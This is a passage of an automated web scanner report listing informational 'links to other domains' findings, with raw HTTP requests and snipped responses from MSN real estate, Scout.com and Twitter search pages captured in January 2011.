...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">Twenty best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.289. http://realestate.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://realestate.redacted
Path:   /slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /slideshow.aspx?cp-documentid=26575521&GT1=35006 HTTP/1.1
Host: realestate.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:57:16 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fc146fe65820484da7658692ce1e2a17; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=2069133775604408A58F0028072AA305; domain=.redacted; expires=Thu, 18-Aug-2011 16:57:16 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 90236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=MSREAL">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406636&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Frealestate.redacted%2Fslideshow.aspx%3Fcp-documentid%3D26575521%26GT1%3D35006&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com?form=SYNDRE"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=fannie+freddie+backlog&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Foreclosure+activity+up+us+metro+areas&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li><a href="http://www.bing.com/search?q=2011+housing+market+flat&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=Home-loan+program+oversight&amp;form=SYNDRE"><span class="custom">
...[SNIP]...
<p class="partnerlogo cf"><a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)"><img src="http://blstb.redacted/i/2A/E3C886CAF6B03CEE763CBA591FEE6.jpg" alt="Businessweek.com" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xb9ladS5yMb2Ca2ff4Vp00sgAXSoqJ534?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X8HntcrS-eQkL2XeTs9l7feCgy6mG3Xec?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-dd7c094acdf69f72.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">william green</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-dd7c094acdf69f72.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X5oUTRjU1vUfBWxKWcLjsoUOPyRmK1eNi?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XLkVMZuHEnRQzOwo1899GbHzPIG8NfpKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-cb42799ca557bdac.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">HELEN</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-cb42799ca557bdac.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbCErejGBG1rBcuXycQTC62Ud7gg-UXzC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">r o
..(slipknot5)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-aadae429816198d4.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Mike
..(NVanHiker)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-011831ffce31112c.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<cite>By..Venessa Wong..of..<a href="http://businessweek.com/" onclick="return Msn.Navigation.OpenPopup(event,this)">Bloomberg Businessweek</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&amp;FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://delwebb.com/communities/tx/richmond/del-webb-houston/index.aspx" onclick="window.open(this.href);return false;">Del Webb Sweetgrass</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<p>According to the community's <a href="http://cpwliving.com/" onclick="window.open(this.href);return false;">website</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<br />Approved by the town of <a href="http://www.bing.com/search?q=apex%2C+n.c.&amp;go=&amp;form=MSREAL" onclick="window.open(this.href);return false;">Apex</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
</strong> <a href="http://www.bing.com/search?q=Median+Home+Prices+by+State&amp;FORM=MSREAL" onclick="window.open(this.href);return false;">What's the median home price in your area?</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<strong><a href="http://images.businessweek.com/ss/10/09/0909_builders_buying/2.htm">Click here for Businessweek.com's full list of where builders are buying.</a>
...[SNIP]...
<li class="first"><a href="http://images.businessweek.com/slideshows/20101027/twenty-best-places-to-start-over-2010/?campaign_id=msn">Twenty best places to start over</a>
...[SNIP]...
<li><a href="http://images.businessweek.com/ss/10/09/0930_discount_condos/index.htm?campaign_id=msn">America's most discounted luxury apartments</a>
...[SNIP]...
<li class="last"><a href="http://images.businessweek.com/ss/10/10/1007_highest_incomes/index.htm?campaign_id=msn">America's highest-income cities by state</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://realestate.msn.us.intellitxt.com/ast/js/msn/realestate.msn_cs.js"></script>
...[SNIP]...
<p><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://twitter.com/msnrealestate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">Follow us</a> on Twitter and <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://facebook.com/MSNRealEstate?ocid=TXT_MSNCH_REALESTATE_FollowMSN">become a fan</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalrealest.112.2O7.net/b/ss/msnportalrealest/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.290. http://recruiting.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://recruiting.scout.com
Path:   /a.z

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /a.z?s=73&p=9&c=4&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:50:45 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 21 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 00:00:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211589

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Football Recruiting</title>
<meta http-eq
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<center><a href="http://www.superprep.com/form.html"><img border=0 src="http://media.scout.com/media/image/18/188540.gif">
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&amp;site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" />
   </noscript>
...[SNIP]...

22.291. http://rss.scout.com/rss.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rss.scout.com
Path:   /rss.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /rss.aspx?s=143&p=18 HTTP/1.1
Host: rss.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Content-Type: text/html; charset=utf-8
Akamai: True
Cache-Control: private, max-age=900
Date: Sun, 30 Jan 2011 02:18:31 GMT
Connection: close
Connection: Transfer-Encoding
Akamai: True
Content-Length: 263787

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: RSS Feeds</title>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<div class="left"><a class="logo" href="http://www.redacted/"><img src="http://cdn-cms.scout.com/images/layout/msn.gif" alt="MSN" />
...[SNIP]...
<li><a href="http://entertainment.redacted/">Entertainment</a>
...[SNIP]...
<li><a href="http://moneycentral.redacted/home.asp">Money</a>
...[SNIP]...
<li><a href="http://lifestyle.redacted/">Lifestyle</a>
...[SNIP]...
<li><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
</ul><a class="logo logo-bing" href="http://www.bing.com/search?FORM=FOXSP">Bing</a>
...[SNIP]...
<li><a class="img" href="http://www.foxsports.com/"><img src="http://cdn-cms.scout.com/images/layout/menu-item-fox-sports.gif" alt="FOXSports" />
...[SNIP]...
<li><a class="external" href="http://www.ticketcity.com/">Tickets</a>
...[SNIP]...
<p class="left">
                   <a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
                   <a href="http://g.redacted/0TO_/enus">Legal</a>
                   <a href="http://advertising.redacted/msn/">Advertise on MSN</a>
                   <a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
                   <a href="http://rss.redacted/">RSS</a>
...[SNIP]...
<noscript>
       <img src="http://pt200191.unica.com/ntpagetag.gif?js=0&amp;site=scout.com" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
       <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=3000001&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" />
   </noscript>
...[SNIP]...

22.292. http://search.twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=$1 HTTP/1.1
Host: search.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 01:37:09 GMT
Server: hi
Status: 200 OK
X-Served-From: slc1-aav-26-sr1
X-Runtime: 0.78540
Content-Type: text/html; charset=utf-8
X-Timeline-Cache-Hit: Hit
X-Served-By: slc1-abf-32-sr1.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Sun, 30 Jan 2011 01:42:08 GMT
Content-Length: 37363
Vary: Accept-Encoding
X-Varnish: 935694613
Age: 0
Via: 1.1 varnish
X-Cache-Svr: slc1-abf-32-sr1.prod.twitter.com
X-Cache: MISS
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
       <meta name="descriptio
...[SNIP]...
<a href="http://twitter.com/MMflint" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/MMflint');"><img alt="Mm_twit_pic_normal" src="http://a3.twimg.com/profile_images/391715682/mm_twit_pic_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://blackberry.com/twitter" rel="nofollow">Twitter for BlackBerry..</a>
...[SNIP]...
<a href="http://twitter.com/huffingtonpost" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/huffingtonpost');"><img alt="Huffingtonpost_normal" src="http://a2.twimg.com/profile_images/933535501/huffingtonpost_normal.png" /></a>
...[SNIP]...
</b> trillion. A woman blamed him for 9/11. Good luck. <a href="http://huff.to/gdVpZy" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/link/30968352725794816');" rel="nofollow">http://huff.to/gdVpZy</a>
...[SNIP]...
<span class="source">via <a href="http://www.huffingtonpost.com" rel="nofollow">The Huffington Post</a>
...[SNIP]...
<a href="http://twitter.com/sadydoyle" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/sadydoyle');"><img alt="Tumblr_kyl0syalde1qzk29eo1_500_normal" src="http://a3.twimg.com/profile_images/785995391/tumblr_kyl0syaldE1qzk29eo1_500_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/lilmatttt" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/lilmatttt');"><img alt="Dsc_0058_normal" src="http://a2.twimg.com/profile_images/1184802298/DSC_0058_normal.jpg" /></a>
...[SNIP]...
</b> Trillion, Blamed for 9/11 | Billboard.com <a href="http://t.co/VN2VmIG" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31526221271539712');" rel="nofollow">http://t.co/VN2VmIG</a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/JeffTaylorTeam" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/JeffTaylorTeam');"><img alt="Jefftaylor3_normal" src="http://a2.twimg.com/profile_images/445466122/JeffTaylor3_normal.JPG" /></a>
...[SNIP]...
</b> <a href="http://bit.ly/fW9BmK" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31526178556743682');" rel="nofollow">http://bit.ly/fW9BmK</a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/LRRcoffeebar" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/LRRcoffeebar');"><img alt="31325_118988814788575_113537798667010_184317_4284322_n_normal" src="http://a0.twimg.com/profile_images/1118859259/31325_118988814788575_113537798667010_184317_4284322_n_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/slgkag" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/slgkag');"><img alt="Kinsey_normal" src="http://a1.twimg.com/profile_images/1161507057/Kinsey_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://blackberry.com/twitter" rel="nofollow">Twitter for BlackBerry..</a>
...[SNIP]...
<a href="http://twitter.com/downosaur" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/downosaur');"><img alt="26070_1377141794009_1395785394_31041221_1449864_n_normal" src="http://a3.twimg.com/profile_images/799365774/26070_1377141794009_1395785394_31041221_1449864_n_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/teambiebermama" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/teambiebermama');"><img alt="Image_normal" src="http://a3.twimg.com/profile_images/1213958941/image_normal.jpg" /></a>
...[SNIP]...
<a href="http://twitter.com/LesterMaddix415" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/LesterMaddix415');"><img alt="9840300771itf4_normal" src="http://a0.twimg.com/profile_images/1226751532/9840300771itf4_normal.jpg" /></a>
...[SNIP]...
</b>,000 Victoria&apos;s Secret Gift Card! <a href="http://bit.ly/fNF1PS?=njmx" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31526093190078464');" rel="nofollow">http://bit.ly/fNF1PS?=njmx</a>
...[SNIP]...

22.293. http://search.twitter.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.twitter.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /search?q=$1 HTTP/1.1
Host: search.twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 17:24:14 GMT
Server: hi
Status: 200 OK
X-Served-From: slc1-abk-25-sr1
X-Runtime: 0.32044
Content-Type: text/html; charset=utf-8
X-Timeline-Cache-Hit: Hit
X-Served-By: slc1-ack-34-sr3.prod.twitter.com
Cache-Control: max-age=15, must-revalidate, max-age=300
Expires: Sun, 30 Jan 2011 17:29:14 GMT
Content-Length: 37067
Vary: Accept-Encoding
X-Varnish: 1794052676
Age: 0
Via: 1.1 varnish
X-Cache-Svr: slc1-ack-34-sr3.prod.twitter.com
X-Cache: MISS
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="content-type" content="text/html; charset=UTF-8">
       <meta name="descriptio
...[SNIP]...
<a href="http://twitter.com/MMflint" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/MMflint');"><img alt="Mm_twit_pic_normal" src="http://a3.twimg.com/profile_images/391715682/mm_twit_pic_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://blackberry.com/twitter" rel="nofollow">Twitter for BlackBerry..</a>
...[SNIP]...
<a href="http://twitter.com/huffingtonpost" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/huffingtonpost');"><img alt="Huffingtonpost_normal" src="http://a2.twimg.com/profile_images/933535501/huffingtonpost_normal.png" /></a>
...[SNIP]...
</b> trillion. A woman blamed him for 9/11. Good luck. <a href="http://huff.to/gdVpZy" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/link/30968352725794816');" rel="nofollow">http://huff.to/gdVpZy</a>
...[SNIP]...
<span class="source">via <a href="http://www.huffingtonpost.com" rel="nofollow">The Huffington Post</a>
...[SNIP]...
<a href="http://twitter.com/texas10titans" onclick="pageTracker._setCustomVar(2, 'result_type', 'popular', 3);pageTracker._trackPageview('/exit/to/texas10titans');"><img alt="26_normal" src="http://a0.twimg.com/profile_images/1229348121/26_normal.jpg" /></a>
...[SNIP]...
<span class="source">via <a href="http://www.tweetdeck.com" rel="nofollow">TweetDeck</a>
...[SNIP]...
<a href="http://twitter.com/TiffaniAper5751" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/TiffaniAper5751');"><img alt="4813023771209438_double_call_normal" src="http://a0.twimg.com/profile_images/1224173446/4813023771209438_double_call_normal.jpg" /></a>
...[SNIP]...
</b>,500 is waiting for you! Get your cash now! Immediate approval! <a href="http://bit.ly/fP4Rur?=nte1" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/link/31764502810726401');" rel="nofollow">http://bit.ly/fP4Rur?=nte1</a>
...[SNIP]...
<a href="http://twitter.com/Von411" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/exit/to/Von411');"><img alt="Img_0872_normal" src="http://a1.twimg.com/profile_images/1140743812/IMG_0872_normal.JPG" /></a>
...[SNIP]...
